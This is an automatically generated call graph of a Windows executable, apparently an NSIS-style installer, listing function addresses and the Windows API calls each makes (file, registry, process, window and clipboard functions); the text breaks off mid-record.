25 API calls 3301->3303 3310 4021e1 3303->3310 3305 402bbf 18 API calls 3306 401fe5 3305->3306 3307 401ffb LoadLibraryExW 3306->3307 3308 401fed GetModuleHandleW 3306->3308 3307->3301 3309 40200c 3307->3309 3308->3307 3308->3309 3325 406499 WideCharToMultiByte 3309->3325 3313 402056 3315 4051af 25 API calls 3313->3315 3314 40201d 3317 40202d 3314->3317 3328 401423 3314->3328 3315->3317 3317->3310 3318 402079 FreeLibrary 3317->3318 3318->3310 3320 402bcb 3319->3320 3321 406072 18 API calls 3320->3321 3322 402bec 3321->3322 3323 401fdc 3322->3323 3324 4062e4 5 API calls 3322->3324 3323->3305 3324->3323 3326 4064c3 GetProcAddress 3325->3326 3327 402017 3325->3327 3326->3327 3327->3313 3327->3314 3329 4051af 25 API calls 3328->3329 3330 401431 3329->3330 3330->3317 3700 4016c4 3701 402bbf 18 API calls 3700->3701 3702 4016ca GetFullPathNameW 3701->3702 3703 401706 3702->3703 3704 4016e4 3702->3704 3705 40171b GetShortPathNameW 3703->3705 3706 402a4c 3703->3706 3704->3703 3707 406393 2 API calls 3704->3707 3705->3706 3708 4016f6 3707->3708 3708->3703 3710 406050 lstrcpynW 3708->3710 3710->3703 3711 4014cb 3712 4051af 25 API calls 3711->3712 3713 4014d2 3712->3713 3714 40194e 3715 402bbf 18 API calls 3714->3715 3716 401955 lstrlenW 3715->3716 3717 402531 3716->3717 3718 4027ce 3719 4027d6 3718->3719 3720 4027da FindNextFileW 3719->3720 3722 4027ec 3719->3722 3721 402833 3720->3721 3720->3722 3724 406050 lstrcpynW 3721->3724 3724->3722 3725 401754 3726 402bbf 18 API calls 3725->3726 3727 40175b 3726->3727 3728 405c54 2 API calls 3727->3728 3729 401762 3728->3729 3729->3729 3730 401d56 GetDC GetDeviceCaps 3731 402ba2 18 API calls 3730->3731 3732 401d74 MulDiv ReleaseDC 3731->3732 3733 402ba2 18 API calls 3732->3733 3734 401d93 3733->3734 3735 406072 18 API calls 3734->3735 3736 401dcc CreateFontIndirectW 3735->3736 3737 402531 3736->3737 3479 4014d7 3484 402ba2 3479->3484 3481 4014dd Sleep 3483 402a4c 3481->3483 3485 406072 18 API calls 3484->3485 3486 402bb6 3485->3486 3486->3481 3738 401a57 3739 402ba2 18 API calls 3738->3739 3740 401a5d 3739->3740 3741 402ba2 18 API calls 3740->3741 3742 401a05 3741->3742 3743 403857 3744 403862 3743->3744 3745 403866 3744->3745 3746 403869 GlobalAlloc 3744->3746 3746->3745 3747 40155b 3748 4029f2 3747->3748 3751 405f97 wsprintfW 3748->3751 3750 4029f7 3751->3750 3752 401ddc 3753 402ba2 18 API calls 3752->3753 3754 401de2 3753->3754 3755 402ba2 18 API calls 3754->3755 3756 401deb 3755->3756 3757 401df2 ShowWindow 3756->3757 3758 401dfd EnableWindow 3756->3758 3759 402a4c 3757->3759 3758->3759 3760 401bdf 3761 402ba2 18 API calls 3760->3761 3762 401be6 3761->3762 3763 402ba2 18 API calls 3762->3763 3764 401bf0 3763->3764 3765 401c00 3764->3765 3767 402bbf 18 API calls 3764->3767 3766 401c10 3765->3766 3768 402bbf 18 API calls 3765->3768 3769 401c1b 3766->3769 3770 401c5f 3766->3770 3767->3765 3768->3766 3771 402ba2 18 API calls 3769->3771 3772 402bbf 18 API calls 3770->3772 3773 401c20 3771->3773 3774 401c64 3772->3774 3775 402ba2 18 API calls 3773->3775 3776 402bbf 18 API calls 3774->3776 3778 401c29 3775->3778 3777 401c6d FindWindowExW 3776->3777 3781 401c8f 3777->3781 3779 401c31 SendMessageTimeoutW 3778->3779 3780 401c4f SendMessageW 3778->3780 3779->3781 3780->3781 3782 4022df 3783 402bbf 18 API calls 3782->3783 3784 4022ee 3783->3784 3785 402bbf 18 API calls 3784->3785 3786 4022f7 3785->3786 3787 402bbf 18 API calls 3786->3787 3788 402301 GetPrivateProfileStringW 3787->3788 3789 401960 3790 402ba2 18 API calls 3789->3790 3791 401967 3790->3791 3792 402ba2 18 API calls 3791->3792 3793 401971 3792->3793 3794 402bbf 18 API calls 3793->3794 3795 40197a 3794->3795 3796 40198e lstrlenW 3795->3796 3798 4019ca 3795->3798 3797 401998 3796->3797 3797->3798 3802 406050 lstrcpynW 3797->3802 3800 4019b3 3800->3798 3801 4019c0 lstrlenW 3800->3801 3801->3798 3802->3800 3803 404262 lstrlenW 3804 404281 3803->3804 3805 404283 WideCharToMultiByte 3803->3805 3804->3805 3806 401662 3807 402bbf 18 API calls 3806->3807 3808 401668 3807->3808 3809 406393 2 API calls 3808->3809 3810 40166e 3809->3810 3811 4019e4 3812 402bbf 18 API calls 3811->3812 3813 4019eb 3812->3813 3814 402bbf 18 API calls 3813->3814 3815 4019f4 3814->3815 3816 4019fb lstrcmpiW 3815->3816 3817 401a0d lstrcmpW 3815->3817 3818 401a01 3816->3818 3817->3818 3819 4025e5 3820 402ba2 18 API calls 3819->3820 3829 4025f4 3820->3829 3821 40272d 3822 40263a ReadFile 3822->3821 3822->3829 3823 405ca8 ReadFile 3823->3829 3825 40267a MultiByteToWideChar 3825->3829 3826 40272f 3841 405f97 wsprintfW 3826->3841 3828 4026a0 SetFilePointer MultiByteToWideChar 3828->3829 3829->3821 3829->3822 3829->3823 3829->3825 3829->3826 3829->3828 3830 402740 3829->3830 3832 405d06 SetFilePointer 3829->3832 3830->3821 3831 402761 SetFilePointer 3830->3831 3831->3821 3833 405d22 3832->3833 3838 405d3e 3832->3838 3834 405ca8 ReadFile 3833->3834 3835 405d2e 3834->3835 3836 405d47 SetFilePointer 3835->3836 3837 405d6f SetFilePointer 3835->3837 3835->3838 3836->3837 3839 405d52 3836->3839 3837->3838 3838->3829 3840 405cd7 WriteFile 3839->3840 3840->3838 3841->3821 3331 401e66 3332 402bbf 18 API calls 3331->3332 3333 401e6c 3332->3333 3334 4051af 25 API calls 3333->3334 3335 401e76 3334->3335 3336 405730 2 API calls 3335->3336 3337 401e7c 3336->3337 3338 401edb CloseHandle 3337->3338 3339 401e8c WaitForSingleObject 3337->3339 3340 40281e 3337->3340 3338->3340 3342 401e9e 3339->3342 3341 401eb0 GetExitCodeProcess 3344 401ec2 3341->3344 3345 401ecf 3341->3345 3342->3341 3343 406466 2 API calls 3342->3343 3348 401ea5 WaitForSingleObject 3343->3348 3349 405f97 wsprintfW 3344->3349 3345->3338 3347 401ecd 3345->3347 3347->3338 3348->3342 3349->3347 3350 401767 3351 402bbf 18 API calls 3350->3351 3352 40176e 3351->3352 3353 401796 3352->3353 3354 40178e 3352->3354 3390 406050 lstrcpynW 3353->3390 3389 406050 lstrcpynW 3354->3389 3357 401794 3361 4062e4 5 API calls 3357->3361 3358 4017a1 3359 405a04 3 API calls 3358->3359 3360 4017a7 lstrcatW 3359->3360 3360->3357 3371 4017b3 3361->3371 3362 406393 2 API calls 3362->3371 3363 405c00 2 API calls 3363->3371 3365 4017c5 CompareFileTime 3365->3371 3366 401885 3367 4051af 25 API calls 3366->3367 3369 40188f 3367->3369 3368 4051af 25 API calls 3370 401871 3368->3370 3372 403027 32 API calls 3369->3372 3371->3362 3371->3363 3371->3365 3371->3366 3376 406072 18 API calls 3371->3376 3380 406050 lstrcpynW 3371->3380 3385 405795 MessageBoxIndirectW 3371->3385 3386 40185c 3371->3386 3388 405c25 GetFileAttributesW CreateFileW 3371->3388 3373 4018a2 3372->3373 3374 4018b6 SetFileTime 3373->3374 3375 4018c8 FindCloseChangeNotification 3373->3375 3374->3375 3375->3370 3377 4018d9 3375->3377 3376->3371 3378 4018f1 3377->3378 3379 4018de 3377->3379 3382 406072 18 API calls 3378->3382 3381 406072 18 API calls 3379->3381 3380->3371 3383 4018e6 lstrcatW 3381->3383 3384 4018f9 3382->3384 3383->3384 3387 405795 MessageBoxIndirectW 3384->3387 3385->3371 3386->3368 3386->3370 3387->3370 3388->3371 3389->3357 3390->3358 3842 404568 3843 404578 3842->3843 3844 40459e 3842->3844 3846 404114 19 API calls 3843->3846 3845 40417b 8 API calls 3844->3845 3847 4045aa 3845->3847 3848 404585 SetDlgItemTextW 3846->3848 3848->3844 3849 401ee9 3850 402bbf 18 API calls 3849->3850 3851 401ef0 3850->3851 3852 406393 2 API calls 3851->3852 3853 401ef6 3852->3853 3855 401f07 3853->3855 3856 405f97 wsprintfW 3853->3856 3856->3855 3857 4021ea 3858 402bbf 18 API calls 3857->3858 3859 4021f0 3858->3859 3860 402bbf 18 API calls 3859->3860 3861 4021f9 3860->3861 3862 402bbf 18 API calls 3861->3862 3863 402202 3862->3863 3864 406393 2 API calls 3863->3864 3865 40220b 3864->3865 3866 40221c lstrlenW lstrlenW 3865->3866 3867 40220f 3865->3867 3869 4051af 25 API calls 3866->3869 3868 4051af 25 API calls 3867->3868 3871 402217 3867->3871 3868->3871 3870 40225a SHFileOperationW 3869->3870 3870->3867 3870->3871 3391 40156b 3392 401584 3391->3392 3393 40157b ShowWindow 3391->3393 3394 401592 ShowWindow 3392->3394 3395 402a4c 3392->3395 3393->3392 3394->3395 3396 4052ee 3397 405498 3396->3397 3398 40530f GetDlgItem GetDlgItem GetDlgItem 3396->3398 3400 4054a1 GetDlgItem CreateThread FindCloseChangeNotification 3397->3400 3401 4054c9 3397->3401 3441 404149 SendMessageW 3398->3441 3400->3401 3464 405282 5 API calls 3400->3464 3403 4054f4 3401->3403 3404 4054e0 ShowWindow ShowWindow 3401->3404 3405 405519 3401->3405 3402 40537f 3407 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3402->3407 3406 405554 3403->3406 3409 405508 3403->3409 3410 40552e ShowWindow 3403->3410 3446 404149 SendMessageW 3404->3446 3450 40417b 3405->3450 3406->3405 3416 405562 SendMessageW 3406->3416 3414 4053f4 3407->3414 3415 4053d8 SendMessageW SendMessageW 3407->3415 3447 4040ed 3409->3447 3412 405540 3410->3412 3413 40554e 3410->3413 3419 4051af 25 API calls 3412->3419 3420 4040ed SendMessageW 3413->3420 3421 405407 3414->3421 3422 4053f9 SendMessageW 3414->3422 3415->3414 3418 405527 3416->3418 3423 40557b CreatePopupMenu 3416->3423 3419->3413 3420->3406 3442 404114 3421->3442 3422->3421 3424 406072 18 API calls 3423->3424 3426 40558b AppendMenuW 3424->3426 3428 4055a8 GetWindowRect 3426->3428 3429 4055bb TrackPopupMenu 3426->3429 3427 405417 3430 405420 ShowWindow 3427->3430 3431 405454 GetDlgItem SendMessageW 3427->3431 3428->3429 3429->3418 3433 4055d6 3429->3433 3434 405436 ShowWindow 3430->3434 3436 405443 3430->3436 3431->3418 3432 40547b SendMessageW SendMessageW 3431->3432 3432->3418 3435 4055f2 SendMessageW 3433->3435 3434->3436 3435->3435 3437 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3435->3437 3445 404149 SendMessageW 3436->3445 3439 405634 SendMessageW 3437->3439 3439->3439 3440 40565d GlobalUnlock SetClipboardData CloseClipboard 3439->3440 3440->3418 3441->3402 3443 406072 18 API calls 3442->3443 3444 40411f SetDlgItemTextW 3443->3444 3444->3427 3445->3431 3446->3403 3448 4040f4 3447->3448 3449 4040fa SendMessageW 3447->3449 3448->3449 3449->3405 3451 40421c 3450->3451 3452 404193 GetWindowLongW 3450->3452 3451->3418 3452->3451 3453 4041a4 3452->3453 3454 4041b3 GetSysColor 3453->3454 3455 4041b6 3453->3455 3454->3455 3456 4041c6 SetBkMode 3455->3456 3457 4041bc SetTextColor 3455->3457 3458 4041e4 3456->3458 3459 4041de GetSysColor 3456->3459 3457->3456 3460 4041f5 3458->3460 3461 4041eb SetBkColor 3458->3461 3459->3458 3460->3451 3462 404208 DeleteObject 3460->3462 3463 40420f CreateBrushIndirect 3460->3463 3461->3460 3462->3463 3463->3451 3872 40226e 3873 402275 3872->3873 3877 402288 3872->3877 3874 406072 18 API calls 3873->3874 3875 402282 3874->3875 3876 405795 MessageBoxIndirectW 3875->3876 3876->3877 3878 4014f1 SetForegroundWindow 3879 402a4c 3878->3879 3465 401673 3466 402bbf 18 API calls 3465->3466 3467 40167a 3466->3467 3468 402bbf 18 API calls 3467->3468 3469 401683 3468->3469 3470 402bbf 18 API calls 3469->3470 3471 40168c MoveFileW 3470->3471 3472 401698 3471->3472 3473 40169f 3471->3473 3474 401423 25 API calls 3472->3474 3475 406393 2 API calls 3473->3475 3477 4021e1 3473->3477 3474->3477 3476 4016ae 3475->3476 3476->3477 3478 405ef1 38 API calls 3476->3478 3478->3472 3880 401cfa GetDlgItem GetClientRect 3881 402bbf 18 API calls 3880->3881 3882 401d2c LoadImageW SendMessageW 3881->3882 3883 401d4a DeleteObject 3882->3883 3884 402a4c 3882->3884 3883->3884 3514 4027fb 3515 402bbf 18 API calls 3514->3515 3516 402802 FindFirstFileW 3515->3516 3517 402815 3516->3517 3518 40282a 3516->3518 3519 402833 3518->3519 3522 405f97 wsprintfW 3518->3522 3523 406050 lstrcpynW 3519->3523 3522->3519 3523->3517 3524 40237b 3525 402381 3524->3525 3526 402bbf 18 API calls 3525->3526 3527 402393 3526->3527 3528 402bbf 18 API calls 3527->3528 3529 40239d RegCreateKeyExW 3528->3529 3530 4023c7 3529->3530 3531 402a4c 3529->3531 3532 4023e2 3530->3532 3533 402bbf 18 API calls 3530->3533 3534 4023ee 3532->3534 3536 402ba2 18 API calls 3532->3536 3535 4023d8 lstrlenW 3533->3535 3537 402409 RegSetValueExW 3534->3537 3538 403027 32 API calls 3534->3538 3535->3532 3536->3534 3539 40241f RegCloseKey 3537->3539 3538->3537 3539->3531 3885 4014ff 3886 401507 3885->3886 3888 40151a 3885->3888 3887 402ba2 18 API calls 3886->3887 3887->3888 3889 401000 3890 401037 BeginPaint GetClientRect 3889->3890 3892 40100c DefWindowProcW 3889->3892 3893 4010f3 3890->3893 3894 401179 3892->3894 3895 401073 CreateBrushIndirect FillRect DeleteObject 3893->3895 3896 4010fc 3893->3896 3895->3893 3897 401102 CreateFontIndirectW 3896->3897 3898 401167 EndPaint 3896->3898 3897->3898 3899 401112 6 API calls 3897->3899 3898->3894 3899->3898 3900 401904 3901 40193b 3900->3901 3902 402bbf 18 API calls 3901->3902 3903 401940 3902->3903 3904 405841 69 API calls 3903->3904 3905 401949 3904->3905 3906 402d04 3907 402d16 SetTimer 3906->3907 3908 402d2f 3906->3908 3907->3908 3909 402d84 3908->3909 3910 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3908->3910 3910->3909 3911 404905 3912 404931 3911->3912 3913 404915 3911->3913 3915 404964 3912->3915 3916 404937 SHGetPathFromIDListW 3912->3916 3922 405779 GetDlgItemTextW 3913->3922 3918 40494e SendMessageW 3916->3918 3919 404947 3916->3919 3917 404922 SendMessageW 3917->3912 3918->3915 3920 40140b 2 API calls 3919->3920 3920->3918 3922->3917 3923 402786 3924 40278d 3923->3924 3925 4029f7 3923->3925 3926 402ba2 18 API calls 3924->3926 3927 402798 3926->3927 3928 40279f SetFilePointer 3927->3928 3928->3925 3929 4027af 3928->3929 3931 405f97 wsprintfW 3929->3931 3931->3925 3932 401907 3933 402bbf 18 API calls 3932->3933 3934 40190e 3933->3934 3935 405795 MessageBoxIndirectW 3934->3935 3936 401917 3935->3936 3937 401e08 3938 402bbf 18 API calls 3937->3938 3939 401e0e 3938->3939 3940 402bbf 18 API calls 3939->3940 3941 401e17 3940->3941 3942 402bbf 18 API calls 3941->3942 3943 401e20 3942->3943 3944 402bbf 18 API calls 3943->3944 3945 401e29 3944->3945 3946 401423 25 API calls 3945->3946 3947 401e30 ShellExecuteW 3946->3947 3948 401e61 3947->3948 3954 401a15 3955 402bbf 18 API calls 3954->3955 3956 401a1e ExpandEnvironmentStringsW 3955->3956 3957 401a32 3956->3957 3959 401a45 3956->3959 3958 401a37 lstrcmpW 3957->3958 3957->3959 3958->3959 3960 402515 3961 402bbf 18 API calls 3960->3961 3962 40251c 3961->3962 3965 405c25 GetFileAttributesW CreateFileW 3962->3965 3964 402528 3965->3964 3966 402095 3967 402bbf 18 API calls 3966->3967 3968 40209c 3967->3968 3969 402bbf 18 API calls 3968->3969 3970 4020a6 3969->3970 3971 402bbf 18 API calls 3970->3971 3972 4020b0 3971->3972 3973 402bbf 18 API calls 3972->3973 3974 4020ba 3973->3974 3975 402bbf 18 API calls 3974->3975 3977 4020c4 3975->3977 3976 402103 CoCreateInstance 3981 402122 3976->3981 3977->3976 3978 402bbf 18 API calls 3977->3978 3978->3976 3979 401423 25 API calls 3980 4021e1 3979->3980 3981->3979 3981->3980 3982 401b16 3983 402bbf 18 API calls 3982->3983 3984 401b1d 3983->3984 3985 402ba2 18 API calls 3984->3985 3986 401b26 wsprintfW 3985->3986 3987 402a4c 3986->3987 3541 40159b 3542 402bbf 18 API calls 3541->3542 3543 4015a2 SetFileAttributesW 3542->3543 3544 4015b4 3543->3544 3988 401f1d 3989 402bbf 18 API calls 3988->3989 3990 401f24 3989->3990 3991 40642a 5 API calls 3990->3991 3992 401f33 3991->3992 3993 401f4f GlobalAlloc 3992->3993 3996 401fb7 3992->3996 3994 401f63 3993->3994 3993->3996 3995 40642a 5 API calls 3994->3995 3997 401f6a 3995->3997 3998 40642a 5 API calls 3997->3998 3999 401f74 3998->3999 3999->3996 4003 405f97 wsprintfW 3999->4003 4001 401fa9 4004 405f97 wsprintfW 4001->4004 4003->4001 4004->3996 4005 40229d 4006 4022a5 4005->4006 4007 4022ab 4005->4007 4008 402bbf 18 API calls 4006->4008 4009 4022b9 4007->4009 4011 402bbf 18 API calls 4007->4011 4008->4007 4010 4022c7 4009->4010 4012 402bbf 18 API calls 4009->4012 4013 402bbf 18 API calls 4010->4013 4011->4009 4012->4010 4014 4022d0 WritePrivateProfileStringW 4013->4014 3618 40249e 3628 402cc9 3618->3628 3620 4024a8 3621 402ba2 18 API calls 3620->3621 3622 4024b1 3621->3622 3623 4024d5 RegEnumValueW 3622->3623 3624 4024c9 RegEnumKeyW 3622->3624 3626 40281e 3622->3626 3625 4024ee RegCloseKey 3623->3625 3623->3626 3624->3625 3625->3626 3629 402bbf 18 API calls 3628->3629 3630 402ce2 3629->3630 3631 402cf0 RegOpenKeyExW 3630->3631 3631->3620 4015 40149e 4016 402288 4015->4016 4017 4014ac PostQuitMessage 4015->4017 4017->4016 3632 40231f 3633 402324 3632->3633 3634 40234f 3632->3634 3635 402cc9 19 API calls 3633->3635 3636 402bbf 18 API calls 3634->3636 3637 40232b 3635->3637 3638 402356 3636->3638 3639 402335 3637->3639 3643 40236e 3637->3643 3645 402bff RegOpenKeyExW 3638->3645 3640 402bbf 18 API calls 3639->3640 3641 40233c RegDeleteValueW RegCloseKey 3640->3641 3641->3643 3652 402c2a 3645->3652 3654 40236c 3645->3654 3646 402c50 RegEnumKeyW 3647 402c62 RegCloseKey 3646->3647 3646->3652 3649 40642a 5 API calls 3647->3649 3648 402c87 RegCloseKey 3648->3654 3651 402c72 3649->3651 3650 402bff 5 API calls 3650->3652 3653 402ca2 RegDeleteKeyW 3651->3653 3651->3654 3652->3646 3652->3647 3652->3648 3652->3650 3653->3654 3654->3643 2820 4032a0 SetErrorMode GetVersion 2821 4032d5 2820->2821 2822 4032db 2820->2822 2823 40642a 5 API calls 2821->2823 2908 4063ba GetSystemDirectoryW 2822->2908 2823->2822 2825 4032f1 lstrlenA 2825->2822 2826 403301 2825->2826 2911 40642a GetModuleHandleA 2826->2911 2829 40642a 5 API calls 2830 403310 #17 OleInitialize SHGetFileInfoW 2829->2830 2917 406050 lstrcpynW 2830->2917 2832 40334d GetCommandLineW 2918 406050 lstrcpynW 2832->2918 2834 40335f GetModuleHandleW 2835 403377 2834->2835 2919 405a31 2835->2919 2838 4034b0 GetTempPathW 2923 40326f 2838->2923 2840 4034c8 2841 403522 DeleteFileW 2840->2841 2842 4034cc GetWindowsDirectoryW lstrcatW 2840->2842 2933 402dee GetTickCount GetModuleFileNameW 2841->2933 2843 40326f 12 API calls 2842->2843 2846 4034e8 2843->2846 2844 405a31 CharNextW 2847 40339f 2844->2847 2846->2841 2848 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2846->2848 2847->2844 2850 40349b 2847->2850 2852 403499 2847->2852 2851 40326f 12 API calls 2848->2851 3017 406050 lstrcpynW 2850->3017 2859 40351a 2851->2859 2852->2838 2853 4035d9 2961 403899 2853->2961 2854 403536 2854->2853 2856 405a31 CharNextW 2854->2856 2860 4035e9 2854->2860 2872 403555 2856->2872 2859->2841 2859->2860 3034 4037bf 2860->3034 2861 403723 2864 4037a7 ExitProcess 2861->2864 2865 40372b GetCurrentProcess OpenProcessToken 2861->2865 2862 403603 3041 405795 2862->3041 2870 403743 LookupPrivilegeValueW AdjustTokenPrivileges 2865->2870 2871 403777 2865->2871 2867 4035b3 3018 405b0c 2867->3018 2868 403619 3045 405718 2868->3045 2870->2871 2875 40642a 5 API calls 2871->2875 2872->2867 2872->2868 2878 40377e 2875->2878 2879 403793 ExitWindowsEx 2878->2879 2882 4037a0 2878->2882 2879->2864 2879->2882 2880 40363a lstrcatW lstrcmpiW 2880->2860 2884 403656 2880->2884 2881 40362f lstrcatW 2881->2880 3083 40140b 2882->3083 2887 403662 2884->2887 2888 40365b 2884->2888 2886 4035ce 3033 406050 lstrcpynW 2886->3033 3053 4056fb CreateDirectoryW 2887->3053 3048 40567e CreateDirectoryW 2888->3048 2893 403667 SetCurrentDirectoryW 2894 403682 2893->2894 2895 403677 2893->2895 3057 406050 lstrcpynW 2894->3057 3056 406050 lstrcpynW 2895->3056 2900 4036ce CopyFileW 2905 403690 2900->2905 2901 403717 2902 405ef1 38 API calls 2901->2902 2902->2860 2904 406072 18 API calls 2904->2905 2905->2901 2905->2904 2907 403702 CloseHandle 2905->2907 3058 406072 2905->3058 3076 405ef1 MoveFileExW 2905->3076 3080 405730 CreateProcessW 2905->3080 2907->2905 2909 4063dc wsprintfW LoadLibraryExW 2908->2909 2909->2825 2912 406450 GetProcAddress 2911->2912 2913 406446 2911->2913 2915 403309 2912->2915 2914 4063ba 3 API calls 2913->2914 2916 40644c 2914->2916 2915->2829 2916->2912 2916->2915 2917->2832 2918->2834 2920 405a37 2919->2920 2921 403386 CharNextW 2920->2921 2922 405a3e CharNextW 2920->2922 2921->2838 2921->2847 2922->2920 3086 4062e4 2923->3086 2925 403285 2925->2840 2926 40327b 2926->2925 3095 405a04 lstrlenW CharPrevW 2926->3095 2929 4056fb 2 API calls 2930 403293 2929->2930 3098 405c54 2930->3098 3102 405c25 GetFileAttributesW CreateFileW 2933->3102 2935 402e2e 2955 402e3e 2935->2955 3103 406050 lstrcpynW 2935->3103 2937 402e54 3104 405a50 lstrlenW 2937->3104 2941 402e65 GetFileSize 2942 402f61 2941->2942 2960 402e7c 2941->2960 3109 402d8a 2942->3109 2944 402f6a 2946 402f9a GlobalAlloc 2944->2946 2944->2955 3144 403258 SetFilePointer 2944->3144 3120 403258 SetFilePointer 2946->3120 2947 402fcd 2952 402d8a 6 API calls 2947->2952 2950 402f83 2953 403242 ReadFile 2950->2953 2951 402fb5 3121 403027 2951->3121 2952->2955 2956 402f8e 2953->2956 2955->2854 2956->2946 2956->2955 2957 402d8a 6 API calls 2957->2960 2958 402fc1 2958->2955 2958->2958 2959 402ffe SetFilePointer 2958->2959 2959->2955 2960->2942 2960->2947 2960->2955 2960->2957 3141 403242 2960->3141 2962 40642a 5 API calls 2961->2962 2963 4038ad 2962->2963 2964 4038b3 2963->2964 2965 4038c5 2963->2965 3181 405f97 wsprintfW 2964->3181 3182 405f1d RegOpenKeyExW 2965->3182 2969 403914 lstrcatW 2970 4038c3 2969->2970 3165 403b6f 2970->3165 2971 405f1d 3 API calls 2971->2969 2974 405b0c 18 API calls 2975 403946 2974->2975 2976 4039da 2975->2976 2979 405f1d 3 API calls 2975->2979 2977 405b0c 18 API calls 2976->2977 2978 4039e0 2977->2978 2981 4039f0 LoadImageW 2978->2981 2982 406072 18 API calls 2978->2982 2980 403978 2979->2980 2980->2976 2985 403999 lstrlenW 2980->2985 2989 405a31 CharNextW 2980->2989 2983 403a96 2981->2983 2984 403a17 RegisterClassW 2981->2984 2982->2981 2988 40140b 2 API calls 2983->2988 2986 403aa0 2984->2986 2987 403a4d SystemParametersInfoW CreateWindowExW 2984->2987 2990 4039a7 lstrcmpiW 2985->2990 2991 4039cd 2985->2991 2986->2860 2987->2983 2992 403a9c 2988->2992 2993 403996 2989->2993 2990->2991 2994 4039b7 GetFileAttributesW 2990->2994 2995 405a04 3 API calls 2991->2995 2992->2986 2997 403b6f 19 API calls 2992->2997 2993->2985 2996 4039c3 2994->2996 2998 4039d3 2995->2998 2996->2991 2999 405a50 2 API calls 2996->2999 3000 403aad 2997->3000 3187 406050 lstrcpynW 2998->3187 2999->2991 3002 403ab9 ShowWindow 3000->3002 3003 403b3c 3000->3003 3005 4063ba 3 API calls 3002->3005 3174 405282 OleInitialize 3003->3174 3006 403ad1 3005->3006 3008 403adf GetClassInfoW 3006->3008 3010 4063ba 3 API calls 3006->3010 3007 403b42 3009 403b5e 3007->3009 3014 403b46 3007->3014 3012 403af3 GetClassInfoW RegisterClassW 3008->3012 3013 403b09 DialogBoxParamW 3008->3013 3011 40140b 2 API calls 3009->3011 3010->3008 3011->2986 3012->3013 3015 40140b 2 API calls 3013->3015 3014->2986 3016 40140b 2 API calls 3014->3016 3015->2986 3016->2986 3017->2852 3196 406050 lstrcpynW 3018->3196 3020 405b1d 3197 405aaf CharNextW CharNextW 3020->3197 3023 4035bf 3023->2860 3032 406050 lstrcpynW 3023->3032 3024 4062e4 5 API calls 3030 405b33 3024->3030 3025 405b64 lstrlenW 3026 405b6f 3025->3026 3025->3030 3027 405a04 3 API calls 3026->3027 3029 405b74 GetFileAttributesW 3027->3029 3029->3023 3030->3023 3030->3025 3031 405a50 2 API calls 3030->3031 3203 406393 FindFirstFileW 3030->3203 3031->3025 3032->2886 3033->2853 3035 4037d7 3034->3035 3036 4037c9 CloseHandle 3034->3036 3206 403804 3035->3206 3036->3035 3042 4057aa 3041->3042 3043 403611 ExitProcess 3042->3043 3044 4057be MessageBoxIndirectW 3042->3044 3044->3043 3046 40642a 5 API calls 3045->3046 3047 40361e lstrcatW 3046->3047 3047->2880 3047->2881 3049 403660 3048->3049 3050 4056cf GetLastError 3048->3050 3049->2893 3050->3049 3051 4056de SetFileSecurityW 3050->3051 3051->3049 3052 4056f4 GetLastError 3051->3052 3052->3049 3054 40570b 3053->3054 3055 40570f GetLastError 3053->3055 3054->2893 3055->3054 3056->2894 3057->2905 3061 40607f 3058->3061 3059 4062ca 3060 4036c1 DeleteFileW 3059->3060 3264 406050 lstrcpynW 3059->3264 3060->2900 3060->2905 3061->3059 3063 406132 GetVersion 3061->3063 3064 406298 lstrlenW 3061->3064 3067 406072 10 API calls 3061->3067 3068 405f1d 3 API calls 3061->3068 3069 4061ad GetSystemDirectoryW 3061->3069 3070 4061c0 GetWindowsDirectoryW 3061->3070 3071 4062e4 5 API calls 3061->3071 3072 4061f4 SHGetSpecialFolderLocation 3061->3072 3073 406072 10 API calls 3061->3073 3074 406239 lstrcatW 3061->3074 3262 405f97 wsprintfW 3061->3262 3263 406050 lstrcpynW 3061->3263 3063->3061 3064->3061 3067->3064 3068->3061 3069->3061 3070->3061 3071->3061 3072->3061 3075 40620c SHGetPathFromIDListW CoTaskMemFree 3072->3075 3073->3061 3074->3061 3075->3061 3077 405f05 3076->3077 3079 405f12 3076->3079 3265 405d7f lstrcpyW 3077->3265 3079->2905 3081 405763 CloseHandle 3080->3081 3082 40576f 3080->3082 3081->3082 3082->2905 3084 401389 2 API calls 3083->3084 3085 401420 3084->3085 3085->2864 3092 4062f1 3086->3092 3087 40636c CharPrevW 3089 406367 3087->3089 3088 40635a CharNextW 3088->3089 3088->3092 3089->3087 3090 40638d 3089->3090 3090->2926 3091 405a31 CharNextW 3091->3092 3092->3088 3092->3089 3092->3091 3093 406346 CharNextW 3092->3093 3094 406355 CharNextW 3092->3094 3093->3092 3094->3088 3096 405a20 lstrcatW 3095->3096 3097 40328d 3095->3097 3096->3097 3097->2929 3099 405c61 GetTickCount GetTempFileNameW 3098->3099 3100 40329e 3099->3100 3101 405c97 3099->3101 3100->2840 3101->3099 3101->3100 3102->2935 3103->2937 3105 405a5e 3104->3105 3106 402e5a 3105->3106 3107 405a64 CharPrevW 3105->3107 3108 406050 lstrcpynW 3106->3108 3107->3105 3107->3106 3108->2941 3110 402d93 3109->3110 3111 402dab 3109->3111 3112 402da3 3110->3112 3113 402d9c DestroyWindow 3110->3113 3114 402db3 3111->3114 3115 402dbb GetTickCount 3111->3115 3112->2944 3113->3112 3145 406466 3114->3145 3117 402dc9 CreateDialogParamW ShowWindow 3115->3117 3118 402dec 3115->3118 3117->3118 3118->2944 3120->2951 3122 403040 3121->3122 3123 40306e 3122->3123 3162 403258 SetFilePointer 3122->3162 3124 403242 ReadFile 3123->3124 3126 403079 3124->3126 3127 4031db 3126->3127 3128 40308b GetTickCount 3126->3128 3130 4031c5 3126->3130 3129 40321d 3127->3129 3134 4031df 3127->3134 3128->3130 3137 4030da 3128->3137 3131 403242 ReadFile 3129->3131 3130->2958 3131->3130 3132 403242 ReadFile 3132->3137 3133 403242 ReadFile 3133->3134 3134->3130 3134->3133 3135 405cd7 WriteFile 3134->3135 3135->3134 3136 403130 GetTickCount 3136->3137 3137->3130 3137->3132 3137->3136 3138 403155 MulDiv wsprintfW 3137->3138 3160 405cd7 WriteFile 3137->3160 3149 4051af 3138->3149 3163 405ca8 ReadFile 3141->3163 3144->2950 3146 406483 PeekMessageW 3145->3146 3147 402db9 3146->3147 3148 406479 DispatchMessageW 3146->3148 3147->2944 3148->3146 3150 4051ca 3149->3150 3159 40526c 3149->3159 3151 4051e6 lstrlenW 3150->3151 3152 406072 18 API calls 3150->3152 3153 